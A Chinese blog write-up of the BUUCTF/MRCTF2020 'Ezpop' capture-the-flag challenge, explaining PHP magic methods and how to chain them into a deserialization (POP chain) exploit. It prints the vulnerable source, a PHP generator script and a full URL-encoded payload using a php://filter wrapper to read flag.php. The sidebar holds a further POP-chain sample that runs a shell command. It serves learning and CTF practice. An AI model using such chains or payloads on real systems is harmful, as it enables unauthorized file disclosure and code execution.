[MRCTF2020]Ezpop 1——pop链的反序列化

最新推荐文章于 2024-02-23 13:28:53 发布
最新推荐文章于 2024-02-23 13:28:53 发布
阅读量1.7k 收藏 9
点赞数 5
分类专栏: buuctf 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/124710649
版权

[MRCTF2020]Ezpop 1

进入环境,得到源码

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

首先,一眼看上去 我们的得到两个关键的信息:一是 flag在 flag.php 另一个是存在文件包含。所以,在本关我们可以尝试使用php伪协议 来读取flag。
本关还有一个考点就是 php反序列化之pop链

前面我们做过许多 反序列化的题
在这里我想在简单的说一下 我前面一直没有注意到的点,包括简单总结一下:
在 php 序列化的时候,只是将类名,变量名等的这类东西以字符串的形式保存起来,而方法其实并没有保存起来。所以我们在反序列化的时候也只是 反序列化类名,变量名(反序列化就是一个将字符串还原的过程)。
序列化,就是保存类的基本信息,而反序列化就是读取。虽然我们没有办法字定义危险函数,但却可以利用已有的敏感函数 通过反序列化 来达到我们的目的。
所以 漏洞的关键点就是 序列化与反序列化的过程用户可控
序列化与反序列化漏洞的精髓在与敏感函数利用与类重构。

简单的说一下 pop链的反序列化

pop链的反序列化本质上和我们前面所用的没有区别。无非是这个长点儿。很像链条一样,一环套一环

php代码审计

__invoke()魔术方法:在类的对象被调用为函数时候,自动被调用
__toString()魔术方法:在类的对象被当作字符串操作的时候,自动被调用
__wakeup()魔术方法,在类的对象反序列化的时候,自动被调用
__construct()构造方法:在类的对象实例化之前,自动被调用
__get()魔术方法:从不可访问的属性中读取数据会触发(访问类中一个不存在的属性时自动调用

在pop链的时候,我比较喜欢从结果往回推
我们先看文件包含的函数include,要调用include函数,就要调用append方法,appendde1方法需要__invoke()进行触发。
__invoke()调用的条件就是Modifier被调用为函数的时候
在这里,我们可以利用__get()方法

_get()中的p赋值为Modifier类,那么相当于Modifier类被当作函数处理,所以会调用Modifier类中的_invoke()方法。

而我们可以利用__toString() 返回Show类的属性str中的属性source,但是test中没有source属性 所以成功调用get方法

__toString()直接输出对象引用的时候,不产生报错。快速获取对象的字符串信息的便捷方式。

调用Show类的__toString()方法:就利用Show的__construct方法触发,把source赋值为Show类

所以,我们调用函数的顺序就是:
__construct->__toString()->__get()->__invoke()->append->文件包含

构建payload:

<?php
class Modifier {
    protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

}

class Test{
    public $p;
     public function __get($key){
        $function = $this->p;
        return $function();
    }
}

$a= new Show();
$file='index.php';
$a->source=new Show();
$a->source->str=new Test();
$a->source->str->p=new Modifier();

对我们的函数进行序列化
这里可以使用网站进行转换:推荐网址

在这里插入图片描述

paylaod:

/index.php?pop=
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A9%3A%22index.php%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

在这里插入图片描述
在这里插入图片描述

hcjtn
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[MRCTF2020]Ezpop-1|php序列化
「 虚幻私塾」
06-30 366
1、打开题目获取到源代码信息,如下: 2、我们的最终目标是获取flag.php中的flag信息,因此分析源代码信息,查看哪里可以获取到flag.php文件,发现在Modifier类中存在include($value),因此想到可以通过php伪协议来获取flag.php的信息,所以现在我们的目的就成了调用append函数,接着往下观察,发现__invoke函数调用了append函数,因此我们只要执行了__invoke函数一样可以获得flag信息,那该怎么执行__invoke函数呢:因此,此时我们应该使用别的函
ThinkPHP 6.x反序列化POP(三)1
08-03
开启ThinkPHP6调试POP分析原创今天宽字节安全pop的起点与前面的利用方式相同,都是/vendor/league/flysystem-cached-
[MRCTF2020]Ezpop
m0_63253040的博客
09-23 128
_wakeup() 使用unserialize时触发,在反序列化之前。__toString 当一个对象被当作一个字符串被调用。__invoke() 当脚本尝试将对象调用为函数时触发。__get() 用于从不可访问的属性读取数据。
ThinkPHP 6.x反序列化POP(一)1
08-03
开启ThinkPHP6调试利用原创今天宽字节安全此处以下同tp 5.2后半部分利用POP分析复现首先寻找可利用的__destruct()在vendor/t
POP构造
最新发布
VZS_0的博客
02-23 1618
wakeup的方法很简单,只需要将反序列化后的字符串,将对象属性数量改大,如,O:3:“fin”:3:{s:1:“a”;//或者env (linux下的命令),向call_user_func(fun类)的$p传递system命令参数。//m类里面没有page这个属性,此时的page会被自动认为是属性/方法,而不是类,触发get。// md5($this->md51) == md5($this->md52) 弱等于。
Laravel8反序列化POP分析挖掘 .pdf
09-05
Laravel8反序列化POP分析挖掘 安全测试 漏洞挖掘 金融安全 数据安全 业务安全
ThinkPHP v3.2.X(SQL注入&文件读取)反序列化POP1
08-03
件: /ThinkPHP/Library/Think/Image/Driver/Imagick.class.php跳板1这时候我们需要个有 destroy()
Buu [MRCTF2020]Ezpop1
Lakers248_的博客
05-08 666
解题思路
[MRCTF2020]Ezpop 1
shinygod的博客
03-28 1336
知识点:各种魔术方法,以及构造反序列化pop子的思路 <?php //flag is in flag.php class Modifier { protected $var="php://filter/resource=flag.php"; public function append($value){ include($value);//漏洞利用点 } public function __invoke(){ //在类被当作函数调用
BUUCTF闯关日记--[MRCTF2020]Ezpop1
qq_64201116的博客
05-14 598
进入页面,熟悉的代码审计 提示了flag.php <?php class Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var); } } class Show{ public $sourc.
BUUCTF-[MRCTF2020]Ezpop
qwsn
11-19 2410
0x01、Web 1.BUUCTF-[MRCTF2020]Ezpop 第一步:开启题目环境 图略 第二步:访问接,发现一段php代码 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%
php反序列化pop.html
07-25
php反序列化pop.html
[MRCTF2020]Ezpop解析
06-30 224
魔法函数:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。创建类对象时自动调用 当使用 new 操作符创建一个类的实例时,构造方法将会自动调用__toString() 会在需要转成字符串时, 会隐式自动调用它, 在PHP内部. 这个也是来自JAVA的当一个对象被当作一个字符串被调用。使用unserialize时触发__get() 用于从不可访问的属性读取数据 #难以访问包括:(1)私有属性,(2)没有初始化的属性。
CTF php反序列化总结
m0_53567065的博客
11-17 4217
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~定义:序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。漏洞原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。常用魔术方法
POP[MRCTF2020]Ezpop
cxiaodi的博客
06-11 84
pop
pop反序列化 [MRCTF2020]Ezpop1
m0_75178803的博客
11-25 1279
PHP 反序列化一个对象时,它首先读取对象的类名,并创建一个新的对象。如果属性个数比实际属性个数多,则 PHP 会忽略这些多余的属性,直接将对象反序列化到一个不完整的状态。这是因为反序列化操作本质上是在将一个字符串转换为可执行的代码,因此如果反序列化的对象包含恶意代码,那么它可能会在反序列化过程中执行。如果我们get方法传入一个pop函数,并且用isset函数检查变量是否被设置,是不是值为null,如果存在且不为null,则反序列化我们传入的pop参数。这个语法意味着,如果构造函数没有收到参数,
[MRCTF2020]Ezpop(详解)
pakho_C的博客
07-29 2249
pop对象的参数source作为Show类的对象(此时source对象也有两个参数source和str),则会执行__toString()函数,returnsource对象的str参数的source,此时str如果是Test类的一个对象,则没有source参数,执行__toString()函数则会找不到source参数,就会调用Test类对象str的__get()函数。所以可以将参数p设置为Modifier类的对象,从而执行__invoke()函数,进而执行append函数。...
php反序列化pop
10-17
PHP反序列化POP是一种利用PHP反序列化漏洞的攻击方式,通过构造恶意的序列化数据,使得反序列化操作在执行过程中触发恶意代码,从而实现攻击目的。POP是一种常见的攻击方式,它利用了PHP魔术方法__wakeup()和__destruct()的特性,通过构造一条对象引用,使得在对象被反序列化时,依次调用每个对象的__wakeup()和__destruct()方法,从而实现攻击目的。 下面是一个简单的POP示例: ``` class A { public $b; function __construct($b) { $this->b = $b; } function __wakeup() { if (isset($this->b)) { unserialize($this->b); } } } class B { public $c; function __construct($c) { $this->c = $c; } function __destruct() { if (isset($this->c)) { unserialize($this->c); } } } class C { public $cmd; function __construct($cmd) { $this->cmd = $cmd; } } $cmd = 'ls -al'; $c = new C($cmd); $b = new B(serialize($c)); $a = new A(serialize($b)); $payload = serialize($a); ``` 在上面的代码中,我们构造了三个类A、B、C,其中类A包含一个成员变量$b,类B包含一个成员变量$c,类C包含一个成员变量$cmd。我们通过构造一个对象引用,使得在对象被反序列化时,依次调用每个对象的__wakeup()和__destruct()方法,最终执行$cmd变量中存储的命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值